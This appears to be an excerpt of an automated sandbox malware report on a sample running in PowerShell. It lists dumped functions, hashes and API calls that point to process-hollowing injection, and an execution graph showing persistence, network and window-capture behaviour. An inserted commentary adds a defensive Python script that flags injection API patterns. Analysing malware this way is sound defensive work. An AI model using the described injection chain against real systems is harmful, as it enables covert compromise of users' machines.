                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0466AA13), ref: 0466B34B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 87a13378e5cc76bf921e4c951956f19560493f90751d357c564d9de202c0caca
                                                                                                            • Instruction ID: 15d1a98f3ba46a4bd56f7ea6a18fd0d6232afdb8a9088b061cda6025368250cd
                                                                                                            • Opcode Fuzzy Hash: 87a13378e5cc76bf921e4c951956f19560493f90751d357c564d9de202c0caca
                                                                                                            • Instruction Fuzzy Hash: 981103B19006598FDB20CF9AD845B9EBBF4EB88720F548029D459B3200E778A545CFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f2228dc7c48b766224eb430d0094bd79cc37b42e2baabc50ca97741e02c19f7d
                                                                                                            • Instruction ID: 2e2b68bbf56a21e2a1f8d68bae07c10e9c354a25d4dda163244f1437aec103ca
                                                                                                            • Opcode Fuzzy Hash: f2228dc7c48b766224eb430d0094bd79cc37b42e2baabc50ca97741e02c19f7d
                                                                                                            • Instruction Fuzzy Hash: EA513BB4B10204DFEB14DB54C494FAABBF2BB88314F158469D905AF391CB72EC418BA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 157e4ab0954a4a06a93885bac099508d102b10e49e2f769c4088f73e5a299891
                                                                                                            • Instruction ID: 82668b9c2a8f85db90b4475886efe39f86b3a8641fbdd3e10235e2239f49c82f
                                                                                                            • Opcode Fuzzy Hash: 157e4ab0954a4a06a93885bac099508d102b10e49e2f769c4088f73e5a299891
                                                                                                            • Instruction Fuzzy Hash: DA515DB4A14204EFEB15CB54C490FEABBF2BF49314F1585A9D505AB351CB72EC81CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f19284c84e06c0bbfca8b93fad3ba9b1c6ff820af16b9f1e11f08c64a45b5065
                                                                                                            • Instruction ID: 631f128f9a5e13449064cec57b944d1afa857be7b576226814fbef41b15ebbfc
                                                                                                            • Opcode Fuzzy Hash: f19284c84e06c0bbfca8b93fad3ba9b1c6ff820af16b9f1e11f08c64a45b5065
                                                                                                            • Instruction Fuzzy Hash: E81148B02093846FEB1963340C24B6A3FB66F82704F0880AEF645DF2D2D8A49C41836A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671081935.00000000045FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045FD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_45fd000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dd801b17a3ada2a63f3900a2c055170e4ce2f0fc305ab1ab30a3773094947174
                                                                                                            • Instruction ID: 7830c776a27c8f91d326c6efb3074672e5a1f0e9014b1be2177b1177cf12d667
                                                                                                            • Opcode Fuzzy Hash: dd801b17a3ada2a63f3900a2c055170e4ce2f0fc305ab1ab30a3773094947174
                                                                                                            • Instruction Fuzzy Hash: 4601FC315043009AE7204E11EC84767BFACEF41725F08C51ADE454B182E675A849DAB7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671081935.00000000045FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045FD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_45fd000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b0ba741be444b175a47299a103882feaab351e72bc584e8ba9b34b4c0959f6f9
                                                                                                            • Instruction ID: 319a546d992e417d954eb331baef34b79c4687f033843634eefc55c0a76d74c5
                                                                                                            • Opcode Fuzzy Hash: b0ba741be444b175a47299a103882feaab351e72bc584e8ba9b34b4c0959f6f9
                                                                                                            • Instruction Fuzzy Hash: F7015E7110E3C09FD7128B259D94B56BFB8EF43224F1981DBDD888F1A3C2695849C772
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2fa7388fa09b046ddcb41215fd120708076f67019a47b20ee7231fef28520b78
                                                                                                            • Instruction ID: d34b72aa31d95a9adc0a5006ba83ea7e96f3e1973bddd015e38bd5eb2fa939e4
                                                                                                            • Opcode Fuzzy Hash: 2fa7388fa09b046ddcb41215fd120708076f67019a47b20ee7231fef28520b78
                                                                                                            • Instruction Fuzzy Hash: 54F0CDB035030977F92877655815F6A39D6AF85B14F50842CFA059F3C0DDB1AC414399
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 84Oj$84Oj$tPq$tPq$$q$$q$$q$$q$$q$$q
                                                                                                            • API String ID: 0-651034538
                                                                                                            • Opcode ID: cc98c69c350671539c1eb372ac2d2a1d1cd644dcf1bac06740dcc2610a5f3b93
                                                                                                            • Instruction ID: 25cec3379635437a8d15fbd50919177216f32a99a9039fef7c06db84b978151e
                                                                                                            • Opcode Fuzzy Hash: cc98c69c350671539c1eb372ac2d2a1d1cd644dcf1bac06740dcc2610a5f3b93
                                                                                                            • Instruction Fuzzy Hash: A7911CB1B043179FDF205A6998007AAFBE6FFC5215F28887BD959CB281DA31DC41C7A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$$q$$q$$q$$q
                                                                                                            • API String ID: 0-1538229613
                                                                                                            • Opcode ID: 925a44a434e12b7d739991dc2d03b926d53a54f781ce63283b4a741aec1d8469
                                                                                                            • Instruction ID: f816f06e4e64f74a9fc8c40230bba834d61afe5eacf375be0b8cb28b7e79bbee
                                                                                                            • Opcode Fuzzy Hash: 925a44a434e12b7d739991dc2d03b926d53a54f781ce63283b4a741aec1d8469
                                                                                                            • Instruction Fuzzy Hash: 29C118B5B0062BDFDF249A69D8406EABBF6BFC5211B14847BD90ACB351DA31DC02C791
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q$$q$Gj$Gj
                                                                                                            • API String ID: 0-337631293
                                                                                                            • Opcode ID: 5533e80c219a234239255bfd67798b3f3d4692efc7c8b3a591576d34271f49b6
                                                                                                            • Instruction ID: c1484aeac78f21a427772b460997f5d37fee00ecc0548bbb05384026700dad98
                                                                                                            • Opcode Fuzzy Hash: 5533e80c219a234239255bfd67798b3f3d4692efc7c8b3a591576d34271f49b6
                                                                                                            • Instruction Fuzzy Hash: 7B1193B27042179BFF34562A9811BE6B7A6BBC5761F28883BE84D8B3C0CA75D841C751
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$Gj$Gj
                                                                                                            • API String ID: 0-1353123942
                                                                                                            • Opcode ID: 1c1e756a88df6ab1e07deb38b339a2b8672f7188808955922ff648631ffdf06a
                                                                                                            • Instruction ID: 03c8997099a721941e41986bed2dc28886332ab9dc82dc1c557ba7f95820a132
                                                                                                            • Opcode Fuzzy Hash: 1c1e756a88df6ab1e07deb38b339a2b8672f7188808955922ff648631ffdf06a
                                                                                                            • Instruction Fuzzy Hash: 43215E7070079A5BEF289A69C450BBA7A96BBC5750F188039E9058B780DE72DC41C790
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$$q$$q
                                                                                                            • API String ID: 0-3199993180
                                                                                                            • Opcode ID: 4c8202066c50309811ed80a35a93b5ea5466cd0c486a7fb78e375aad04532044
                                                                                                            • Instruction ID: 37d0185a8cdfcabcae6434fa064712b91c5a9cb235a6830ee4d34204a35fe36e
                                                                                                            • Opcode Fuzzy Hash: 4c8202066c50309811ed80a35a93b5ea5466cd0c486a7fb78e375aad04532044
                                                                                                            • Instruction Fuzzy Hash: 7701A261B0D3C74FDB2B52682C202A66FB26F8315176B85E7D985DF2D3C9654C42C3A3
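The function listing above shows, inside unbacked memory of the powershell.exe process (region 04660000, reported as not PE-backed), a WriteProcessMemory call and a Wow64SetThreadContext call: the write-then-hijack-thread primitives of a process hollowing / thread-context injection chain, which matches the "Injects a PE file into a foreign processes" signature. The following is an added example, not code from the Joe Sandbox report or from the analyzed sample: a small Python triage helper that parses "APIs" and "Memory Dump Source" lines from a listing like this one, groups the API calls by memory region, de-duplicates repeated entries for the same call site, and flags injection-primitive combinations per region. The sample input is constructed from lines copied from this section; the stage table (VirtualAllocEx, ResumeThread, CreateRemoteThread and the Nt* equivalents) is my assumption about what a fuller chain looks like, since this excerpt only shows the write and thread-context stages.

```python
"""Triage helper for Joe Sandbox function listings (added example, not report code).

Groups the API calls of each disassembled function by the memory region the
function was dumped from, then flags regions whose API set contains the
primitives of a remote-write / thread-hijack injection chain.
"""
import re
import sys

# Constructed sample input: lines copied from the function listing above
# (process index 00000010 = powershell.exe, regions 04660000 and 07590000).
# The Wow64SetThreadContext entry is repeated on purpose, as on the page.
SAMPLE_REPORT = """\
APIs
• WriteProcessMemory.KERNELBASE(?,00000000,00000000,18732514,00000000,?,?,?,00000000,00000000,?,0466AC5F,?,00000000,?), ref: 0466B4D4
Memory Dump Source
• Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0466AA13), ref: 0466B34B
Memory Dump Source
• Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0466AA13), ref: 0466B34B
Memory Dump Source
• Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
Memory Dump Source
• Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
"""

# "• Name.MODULE(args), ref: ADDRESS" as printed under "APIs"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "Offset: 04660000, based on PE: false" as printed under "Memory Dump Source"
SOURCE_LINE = re.compile(
    r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)", re.IGNORECASE
)

# Assumed stage table (my generalisation, not from the report): API families
# that make up a typical injection chain.  Only "write" and "hijack_thread"
# are visible in this excerpt.
INJECTION_STAGES = {
    "allocate": {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    "write": {"WriteProcessMemory", "NtWriteVirtualMemory"},
    "hijack_thread": {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    "resume": {"ResumeThread", "NtResumeThread"},
    "create_thread": {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread"},
}


def parse_report(text):
    """Return {offset: {"file_backed": bool, "calls": {(api, ref): module}}}.

    API lines precede the "Memory Dump Source" line of the same function, so
    calls are buffered until the next source line assigns them to a region.
    """
    regions = {}
    pending = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            pending.append((m["api"], m["module"], m["ref"].upper()))
            continue
        m = SOURCE_LINE.search(line)
        if m:
            entry = regions.setdefault(m["offset"].upper(), {"file_backed": None, "calls": {}})
            entry["file_backed"] = m["pe"].lower() == "true"
            for api, module, ref in pending:
                entry["calls"][(api, ref)] = module  # same call site twice -> one entry
            pending = []
    return regions


def assess(regions):
    """Flag regions whose API set contains injection primitives.

    Only what the listing shows is scored: the allocate/resume stages of a full
    hollowing chain may live in functions outside the excerpt.
    """
    findings = []
    for offset, entry in sorted(regions.items()):
        apis = {api for api, _ in entry["calls"]}
        stages = {stage for stage, names in INJECTION_STAGES.items() if apis & names}
        if {"write", "hijack_thread"} <= stages:
            verdict = "thread-context hijack after remote write (process hollowing pattern)"
        elif {"write", "create_thread"} <= stages:
            verdict = "remote thread injection"
        elif "write" in stages:
            verdict = "remote memory write only (partial chain, check other regions)"
        else:
            continue
        findings.append({
            "offset": offset,
            "stages": stages,
            "apis": sorted(apis),
            "file_backed": entry["file_backed"],
            "verdict": verdict,
        })
    return findings


if __name__ == "__main__":
    # usage: python triage.py <listing.txt>   (defaults to the constructed sample)
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_REPORT
    for f in assess(parse_report(text)):
        print(f"region {f['offset']}: {f['verdict']}; apis={f['apis']}; pe_backed={f['file_backed']}")
```

On the constructed sample the helper reports region 04660000 only, with the write and hijack_thread stages and pe_backed False; region 07590000 has no API calls in this excerpt and is silent. A region that is not PE-backed and yet calls these APIs is worth dumping and scanning on its own, since that is where an unpacked second stage (here, the injector that loads Remcos) usually lives.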

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:5.8%
                                                                                                            Total number of Nodes:1366
                                                                                                            Total number of Limit Nodes:64
                                                                                                            execution_graph
401d64 28 API calls 47779->47782 47780 409ec5 SetFileAttributesW 47780->47782 47782->47774 47782->47776 47782->47777 47782->47778 47782->47779 47782->47780 47787 409f10 47782->47787 47806 41b58f 47782->47806 47783 409f3f PathFileExistsW 47783->47787 47785 401f86 28 API calls 47785->47787 47786 40a048 SetFileAttributesW 47786->47782 47787->47783 47787->47785 47787->47786 47788 401eef 26 API calls 47787->47788 47789 406052 28 API calls 47787->47789 47790 401eea 26 API calls 47787->47790 47792 401eea 26 API calls 47787->47792 47815 41b61a 32 API calls 47787->47815 47816 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 47787->47816 47788->47787 47789->47787 47790->47787 47792->47782 47794 409e44 47793->47794 47796 409dad 47793->47796 47794->47782 47795 409dcc CreateFileW 47795->47796 47797 409dda GetFileSize 47795->47797 47796->47795 47798 409e0f CloseHandle 47796->47798 47799 409e21 47796->47799 47800 409e04 Sleep 47796->47800 47801 409dfd 47796->47801 47797->47796 47797->47798 47798->47796 47799->47794 47803 4082dc 28 API calls 47799->47803 47800->47798 47817 40a7f0 83 API calls 47801->47817 47804 409e3d 47803->47804 47805 4098a5 126 API calls 47804->47805 47805->47794 47807 41b5a2 CreateFileW 47806->47807 47809 41b5db 47807->47809 47810 41b5df 47807->47810 47809->47782 47811 41b5f6 WriteFile 47810->47811 47812 41b5e6 SetFilePointer 47810->47812 47813 41b60b CloseHandle 47811->47813 47814 41b609 47811->47814 47812->47811 47812->47813 47813->47809 47814->47813 47815->47787 47816->47787 47817->47800 47820 402d97 47819->47820 47823 4030f7 47820->47823 47822 402dab 47822->47651 47824 403101 47823->47824 47826 403115 47824->47826 47827 4036c2 28 API calls 47824->47827 47826->47822 47827->47826 47829 403b48 47828->47829 47835 403b7a 47829->47835 47832 403cbb 47839 403dc2 47832->47839 47834 403cc9 47834->47309 47836 403b86 47835->47836 47837 403b9e 28 API calls 47836->47837 47838 403b5a 47837->47838 47838->47832 47840 403dce 47839->47840 47843 402ffd 47840->47843 
47842 403de3 47842->47834 47844 40300e 47843->47844 47845 4032a4 28 API calls 47844->47845 47846 40301a 47845->47846 47848 40302e 47846->47848 47849 4035e8 28 API calls 47846->47849 47848->47842 47849->47848 47856 4395ba 47850->47856 47854 412814 47853->47854 47855 4127ed RegSetValueExA RegCloseKey 47853->47855 47854->47335 47855->47854 47859 43953b 47856->47859 47858 401608 47858->47333 47860 43954a 47859->47860 47861 43955e 47859->47861 47867 445354 20 API calls _Atexit 47860->47867 47866 43955a __alldvrm 47861->47866 47869 447601 11 API calls 2 library calls 47861->47869 47863 43954f 47868 43a827 26 API calls _Deallocate 47863->47868 47866->47858 47867->47863 47868->47866 47869->47866 47873 41aab9 ctype ___scrt_fastfail 47870->47873 47871 401f66 28 API calls 47872 41ab2e 47871->47872 47872->47339 47873->47871 47874->47355 47876 413fb3 getaddrinfo WSASetLastError 47875->47876 47877 413fa9 47875->47877 47876->47406 48014 413e37 35 API calls ___std_exception_copy 47877->48014 47879 413fae 47879->47876 47881 404206 socket 47880->47881 47882 4041fd 47880->47882 47884 404220 47881->47884 47885 404224 CreateEventW 47881->47885 48015 404262 WSAStartup 47882->48015 47884->47406 47885->47406 47886 404202 47886->47881 47886->47884 47888 4049b1 47887->47888 47889 40492a 47887->47889 47888->47406 47890 404933 47889->47890 47891 404987 CreateEventA CreateThread 47889->47891 47892 404942 GetLocalTime 47889->47892 47890->47891 47891->47888 48017 404b1d 47891->48017 47893 41ad46 28 API calls 47892->47893 47894 40495b 47893->47894 48016 404c9e 28 API calls 47894->48016 47896 404968 47897 401f66 28 API calls 47896->47897 47898 404977 47897->47898 47899 41a686 79 API calls 47898->47899 47900 40497c 47899->47900 47901 401eea 26 API calls 47900->47901 47901->47891 47903 4043e1 47902->47903 47904 4042b3 47902->47904 47905 404343 47903->47905 47906 4043e7 WSAGetLastError 47903->47906 47904->47905 47907 4042e8 47904->47907 47910 404cbf 28 API calls 47904->47910 47905->47406 47906->47905 
47908 4043f7 47906->47908 48021 420151 27 API calls 47907->48021 47911 4042f7 47908->47911 47912 4043fc 47908->47912 47914 4042d4 47910->47914 47917 401f66 28 API calls 47911->47917 48026 41bc76 30 API calls 47912->48026 47913 4042f0 47913->47911 47916 404306 47913->47916 47918 401f66 28 API calls 47914->47918 47927 404315 47916->47927 47928 40434c 47916->47928 47921 404448 47917->47921 47922 4042e3 47918->47922 47919 40440b 48027 404c9e 28 API calls 47919->48027 47924 401f66 28 API calls 47921->47924 47925 41a686 79 API calls 47922->47925 47923 404418 47926 401f66 28 API calls 47923->47926 47929 404457 47924->47929 47925->47907 47930 404427 47926->47930 47932 401f66 28 API calls 47927->47932 48023 420f34 56 API calls 47928->48023 47933 41a686 79 API calls 47929->47933 47934 41a686 79 API calls 47930->47934 47936 404324 47932->47936 47933->47905 47937 40442c 47934->47937 47935 404354 47938 404389 47935->47938 47939 404359 47935->47939 47940 401f66 28 API calls 47936->47940 47941 401eea 26 API calls 47937->47941 48025 4202ea 28 API calls 47938->48025 47942 401f66 28 API calls 47939->47942 47943 404333 47940->47943 47941->47905 47946 404368 47942->47946 47947 41a686 79 API calls 47943->47947 47945 404391 47948 4043be CreateEventW CreateEventW 47945->47948 47950 401f66 28 API calls 47945->47950 47949 401f66 28 API calls 47946->47949 47960 404338 47947->47960 47948->47905 47951 404377 47949->47951 47953 4043a7 47950->47953 47954 41a686 79 API calls 47951->47954 47955 401f66 28 API calls 47953->47955 47956 40437c 47954->47956 47957 4043b6 47955->47957 48024 420592 54 API calls 47956->48024 47959 41a686 79 API calls 47957->47959 47961 4043bb 47959->47961 48022 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47960->48022 47961->47948 48028 41a945 GlobalMemoryStatusEx 47962->48028 47964 41a982 47964->47406 48029 413646 47965->48029 47969 40cc0d 47968->47969 47970 41246e 3 API calls 47969->47970 47972 40cc14 47970->47972 47971 40cc2c 47971->47406 
47972->47971 47973 4124b7 3 API calls 47972->47973 47973->47971 47975 401f86 28 API calls 47974->47975 47976 41ae03 47975->47976 47976->47406 47978 41aed5 47977->47978 47979 401f86 28 API calls 47978->47979 47980 41aee7 47979->47980 47980->47406 47982 41acb6 GetTickCount 47981->47982 47982->47423 47984 436050 ___scrt_fastfail 47983->47984 47985 41ac71 GetForegroundWindow GetWindowTextW 47984->47985 47986 403b40 28 API calls 47985->47986 47987 41ac9b 47986->47987 47987->47423 47989 401f66 28 API calls 47988->47989 47990 40e69e 47989->47990 47990->47423 47991->47423 47993 4045ec 47992->47993 47994 43a88c ___std_exception_copy 21 API calls 47993->47994 47996 40465b 47993->47996 47997 401f86 28 API calls 47993->47997 47999 401eef 26 API calls 47993->47999 48002 401eea 26 API calls 47993->48002 48062 404688 47993->48062 48073 40455b 59 API calls 47993->48073 47994->47993 47996->47993 47998 404666 47996->47998 47997->47993 48074 4047eb 98 API calls 47998->48074 47999->47993 48001 40466d 48003 401eea 26 API calls 48001->48003 48002->47993 48004 404676 48003->48004 48005 401eea 26 API calls 48004->48005 48006 40467f 48005->48006 48006->47428 48008->47406 48009->47428 48010->47428 48011->47423 48012->47428 48013->47428 48014->47879 48015->47886 48016->47896 48020 404b29 101 API calls 48017->48020 48019 404b26 48020->48019 48021->47913 48022->47905 48023->47935 48024->47960 48025->47945 48026->47919 48027->47923 48028->47964 48032 413619 48029->48032 48033 41362e ___scrt_initialize_default_local_stdio_options 48032->48033 48036 43e2dd 48033->48036 48039 43b030 48036->48039 48040 43b070 48039->48040 48041 43b058 48039->48041 48040->48041 48043 43b078 48040->48043 48056 445354 20 API calls _Atexit 48041->48056 48058 4392de 38 API calls 3 library calls 48043->48058 48044 43b05d 48057 43a827 26 API calls _Deallocate 48044->48057 48047 43b088 48059 43b7b6 20 API calls 2 library calls 48047->48059 48048 433d2c _ValidateLocalCookies 5 API calls 48050 41363c 48048->48050 
48050->47406 48051 43b100 48060 43be24 50 API calls 3 library calls 48051->48060 48053 43b10b 48061 43b820 20 API calls _free 48053->48061 48055 43b068 48055->48048 48056->48044 48057->48055 48058->48047 48059->48051 48060->48053 48061->48055 48068 4046a3 48062->48068 48063 4047d8 48064 401eea 26 API calls 48063->48064 48065 4047e1 48064->48065 48065->47996 48066 403b60 28 API calls 48066->48068 48067 401eef 26 API calls 48067->48068 48068->48063 48068->48066 48068->48067 48069 401eea 26 API calls 48068->48069 48070 401ebd 28 API calls 48068->48070 48071 401fbd 28 API calls 48068->48071 48069->48068 48072 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 48070->48072 48071->48068 48072->48068 48075 414b9b 48072->48075 48073->47993 48074->48001 48076 401fbd 28 API calls 48075->48076 48077 414bbd SetEvent 48076->48077 48078 414bd2 48077->48078 48079 403b60 28 API calls 48078->48079 48080 414bec 48079->48080 48081 401fbd 28 API calls 48080->48081 48082 414bfc 48081->48082 48083 401fbd 28 API calls 48082->48083 48084 414c0e 48083->48084 48085 41afc3 28 API calls 48084->48085 48086 414c17 48085->48086 48087 4161f2 48086->48087 48089 414de3 48086->48089 48090 414c37 GetTickCount 48086->48090 48088 401d8c 26 API calls 48087->48088 48091 4161fb 48088->48091 48089->48087 48149 414d99 48089->48149 48092 41ad46 28 API calls 48090->48092 48093 401eea 26 API calls 48091->48093 48094 414c4d 48092->48094 48096 416207 48093->48096 48097 41aca0 GetTickCount 48094->48097 48099 401eea 26 API calls 48096->48099 48100 414c54 48097->48100 48098 414d7d 48098->48087 48102 416213 48099->48102 48101 41ad46 28 API calls 48100->48101 48103 414c5f 48101->48103 48104 41ac52 30 API calls 48103->48104 48105 414c6d 48104->48105 48106 41aec8 28 API calls 48105->48106 48107 414c7b 48106->48107 48108 401d64 28 API calls 48107->48108 48109 414c89 48108->48109 48154 4027ec 28 API calls 48109->48154 48111 414c97 48155 40275c 28 API calls 48111->48155 48113 414ca6 48114 4027cb 28 API calls 
48113->48114 48115 414cb5 48114->48115 48156 40275c 28 API calls 48115->48156 48117 414cc4 48118 4027cb 28 API calls 48117->48118 48119 414cd0 48118->48119 48157 40275c 28 API calls 48119->48157 48121 414cda 48158 404468 60 API calls ctype 48121->48158 48123 414ce9 48124 401eea 26 API calls 48123->48124 48125 414cf2 48124->48125 48126 401eea 26 API calls 48125->48126 48127 414cfe 48126->48127 48128 401eea 26 API calls 48127->48128 48129 414d0a 48128->48129 48130 401eea 26 API calls 48129->48130 48131 414d16 48130->48131 48132 401eea 26 API calls 48131->48132 48133 414d22 48132->48133 48134 401eea 26 API calls 48133->48134 48135 414d2e 48134->48135 48136 401e13 26 API calls 48135->48136 48137 414d3a 48136->48137 48138 401eea 26 API calls 48137->48138 48139 414d43 48138->48139 48140 401eea 26 API calls 48139->48140 48141 414d4c 48140->48141 48142 401d64 28 API calls 48141->48142 48143 414d57 48142->48143 48144 43a5e7 _strftime 42 API calls 48143->48144 48145 414d64 48144->48145 48146 414d69 48145->48146 48147 414d8f 48145->48147 48150 414d82 48146->48150 48151 414d77 48146->48151 48148 401d64 28 API calls 48147->48148 48148->48149 48149->48087 48160 404ab1 83 API calls 48149->48160 48153 404915 104 API calls 48150->48153 48159 4049ba 81 API calls 48151->48159 48153->48098 48154->48111 48155->48113 48156->48117 48157->48121 48158->48123 48159->48098 48160->48098 48162->47454 48163->47481 48164->47480 48165->47469 48166->47473 48167->47479 48169 40e56a 48168->48169 48170 4124b7 3 API calls 48169->48170 48172 40e60e 48169->48172 48174 40e5fe Sleep 48169->48174 48190 40e59c 48169->48190 48170->48169 48171 4082dc 28 API calls 48171->48190 48173 4082dc 28 API calls 48172->48173 48176 40e619 48173->48176 48174->48169 48175 41ae08 28 API calls 48175->48190 48178 41ae08 28 API calls 48176->48178 48179 40e625 48178->48179 48203 412774 29 API calls 48179->48203 48182 401e13 26 API calls 48182->48190 48183 40e638 48184 401e13 26 API calls 48183->48184 48186 40e644 48184->48186 
48185 401f66 28 API calls 48185->48190 48187 401f66 28 API calls 48186->48187 48188 40e655 48187->48188 48191 4126d2 29 API calls 48188->48191 48189 4126d2 29 API calls 48189->48190 48190->48171 48190->48174 48190->48175 48190->48182 48190->48185 48190->48189 48201 40bf04 73 API calls ___scrt_fastfail 48190->48201 48202 412774 29 API calls 48190->48202 48192 40e668 48191->48192 48204 411699 TerminateProcess WaitForSingleObject 48192->48204 48194 40e670 ExitProcess 48205 411637 61 API calls 48198->48205 48202->48190 48203->48183 48204->48194

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
• GetProcAddress.KERNEL32(00000000), ref: 0041BD01
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
• GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
• GetProcAddress.KERNEL32(00000000), ref: 0041BD30
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
• GetProcAddress.KERNEL32(00000000), ref: 0041BD44
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
• GetProcAddress.KERNEL32(00000000), ref: 0041BD58
